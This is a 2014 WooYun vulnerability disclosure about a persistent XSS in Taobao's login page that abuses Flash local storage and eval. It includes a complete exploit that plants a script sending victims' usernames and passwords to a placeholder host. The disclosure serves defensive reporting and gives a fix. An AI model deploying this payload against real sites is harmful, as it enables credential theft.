当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064580

漏洞标题:淘宝埋雷式XSS第四集可在第三方网站窃取用户帐号密码

相关厂商:淘宝网

漏洞作者: JsStack

提交时间:2014-06-12 09:05

修复时间:2014-08-11 09:06

公开时间:2014-08-11 09:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-12: 该漏洞正等待厂商内部评估
2014-06-12: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2014-07-02: 细节向核心白帽子及相关领域专家公开
2014-07-12: 细节向普通白帽子公开
2014-07-22: 细节向实习白帽子公开
2014-08-11: 细节向公众公开

简要描述:

我很喜欢你们这样,每次都把洞开在同一个地方。

详细说明:

#简单描述:
该漏洞依然是利用JSocket.swf的本地存储形成永久性XSS,利用eval实现攻击。
之前gainover报告过三次相同位置的类似的漏洞,最后一次详见: WooYun: 一个可大规模悄无声息窃取淘宝/支付宝账号与密码的漏洞 -(埋雷式攻击附带视频演示)
与之前三次有所区别的是,此次不是flash代码漏洞,而是js代码缺陷。
*但归根结底是eval的问题。
#漏洞详细
打开淘宝登陆页面,在Console里执行代码:

document.JSocket.getlso();


结果为:

"µ#S#3Â"C#Ss##cSCÇâcS3S#cƒ“cƒ#3s"ÂÕ"


该内容已经被加密。
之前只是修复flash里getlso的实现,将过滤特殊字符(new RegExp("[\\\\({]"))。猜测即使内容有特殊字符,也会被加密,应该也可以正常读取。之后分析代码证实了这个猜测。
找到资源文件ua.js。该文件采用未知混淆技术,使得可读性降低。摘抄部分代码: 

wfp = function() {
        var s5ta = "";
        try {
            var lscx = wev()[q2('OAetlgosl', 4, 1)]();
            for (var i = 0; i < lscx[ib('lbenglhtp', 4, 1)]; i++) {
                var vj = (0x3f3 * 0513 & 65);
                var iz = (0x3f3 % 01305 & 83);
                switch ((++iz - vj--) * (vj++)) {
                case(0x3e8 % 0540 & 65) : var w04a = lscx[ib('LnharcKodeCtAu', 4, 1)](i);
                case(0x3f3 * 0207 & 75) : s5ta += s1[ib('TQtriSgnl', 4, 1)][q2('lBromfpharCUodeCa', 4, 1)](((w04a & 0x0f) << 4) + ((w04a & 0xf0) >> 4));
                    break;
                default:
                    p0o = lk.charCodeAt(lk++);
                }
            }
        } catch(e) {
            s5ta = "";
        }
        return s5ta;
    };


混淆会抹去很多痕迹,比如getlso和setlso在反混淆之前是找不到的。自己用正则写个简单反混淆程序,反混淆后的部分代码为:

wfp = function() {
        var s5ta = "";
        try {
            var lscx = wev()['getlso']();
    
            for (var i = 0; i < lscx['length']; i++) {
                var vj = 1;
                var iz = 2;
    
                switch ((++iz - vj--) * (vj++)) {
                case 0:
                    var w04a = lscx['charCodeAt'](i);
    
                case 1:
                    s5ta += s1['String']['fromCharCode'](((w04a & 0x0f) << 4) + ((w04a & 0xf0) >> 4));
                    break;
                default:
                    p0o = lk.charCodeAt(lk++);
                }
            }
        } catch(e) {
            s5ta = "";
        }
        return s5ta;
    };


pn = function(q1) {
        var cl5m = u3g9;
        for (var i = 0; i < q1['length']; i++) {
            var w04a = q1['charCodeAt'](i);
    
            cl5m += s1['String']['fromCharCode'](((w04a & 0x0f) << 4) + ((w04a & 0xf0) >> 4));
        }
        try {
            wev()['setlso'](cl5m);
    
        } catch(e) {}
    };


可以看在setlso之前是做过简单加密的,而且在getlso后有相应的解密代码。简单修改一下以上代码,在Console里执行:

pn = function(q1) {
        var cl5m = '';
        for (var i = 0; i < q1['length']; i++) {
            var w04a = q1['charCodeAt'](i);
    
            cl5m += window['String']['fromCharCode'](((w04a & 0x0f) << 4) + ((w04a & 0xf0) >> 4));
        }
    
        return document.JSocket.setlso(cl5m);
    
    };
    
    wfp = function() {
        var s5ta = "";
        try {
            var lscx = document.JSocket['getlso']();
    
            for (var i = 0; i < lscx['length']; i++) {
                var vj = 1;
                var iz = 2;
    
                switch ((++iz - vj--) * (vj++)) {
                case 0:
                    var w04a = lscx['charCodeAt'](i);
    
                case 1:
                    s5ta += window['String']['fromCharCode'](((w04a & 0x0f) << 4) + ((w04a & 0xf0) >> 4));
                    break;
                default:
                    p0o = lk.charCodeAt(lk++);
                }
            }
        } catch(e) {
            s5ta = "";
        }
        return s5ta;
    };
    
    pn("alert(1)");
    
    console.debug(wfp() == "alert(1)");


可以看到Console里log了一个true。
再来看代码:

f1mc = function(zz9b) {
        return xkvi['eval']('(' + zz9b + ')');
    };


*用了eval解析解密后的数据。
到此我们知道了缺陷所在,接下来写利用代码,如下:

window.onload = function() {
		function setlso(str) {
			var r = '';
			for (var i = 0; i < str.length; i++) {
				var c = str.charCodeAt(i);
				r += String.fromCharCode(((c & 0x0f) << 4) + ((c & 0xf0) >> 4));
			}
			document.JSocket.setlso(r);
		}
		function mineLaying(str) {
			setTimeout(function() {
				if (document.JSocket) {
					setlso(str);
				} else {
					mineLaying(str);
				}
			}, 1000);
		}
		mineLaying("0);try{function $(i){return document.getElementById(i)}function $c(i){var a=document.getElementsByClassName(i);return a&&a[0]}$('J_StandardPwd').style.display='block';$('J_PasswordEdit').style.display='none';$c('safe-login').style.display='none';var x=$('J_SubmitStatic');x.type='button';x.onclick=function(){if(window.$s){return true}else{x.innerText=x.value=decodeURIComponent('%E6%AD%A3%E5%9C%A8%E8%BF%9B%E5%85%A5...');new Image().src='http://xxxxxxxxxxx/data?u='+escape($('TPL_username_1').value)+'&p='+escape($('TPL_password_1').value);window.$s=1;setTimeout(function(){x.type='submit';x.click()},3000);return false}}}catch(e){};void(0");
	}


当你访问了被植入以上恶意代码的网站时,你并没有感到任何异常。
之后某天你打开淘宝,输入用户名密码,你的帐号便被悄然发送给了黑客。

漏洞证明:

#模拟攻击
这里有一个模拟攻击的页面,效果如下:

result.png


点击链接查看实际运行效果:http://jsfiddle.net/FaEP8/ (不会泄漏你的用户名密码,请放心点击)(没有测试浏览器兼容,不保证在IE下正确运行,推荐使用Chrome打开)

修复方案:

1. 替换掉eval,如果存入数据是json数据,可以用JSON.parse()(某些浏览器需要引入JSON2.js)。如果数据比较复杂,包含可执行方法,那就是设计问题,建议将逻辑抽象后用json或者xml存储。
2. 建议程序员反思自己为何在同一个地方跌倒4次。

版权声明:转载请注明来源 JsStack@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-06-12 10:21

厂商回复:

感谢您对我们的关注和支持,该漏洞我们正在修复!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-12 11:10 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    恭喜洞主

  2. 2014-08-11 09:15 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    二哥,你又用马甲了~~[emoji]

  3. 2014-08-11 10:26 | Blunber ( 实习白帽子 | Rank:84 漏洞数:13 )

    神人也。

  4. 2014-08-12 22:26 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    豪炸天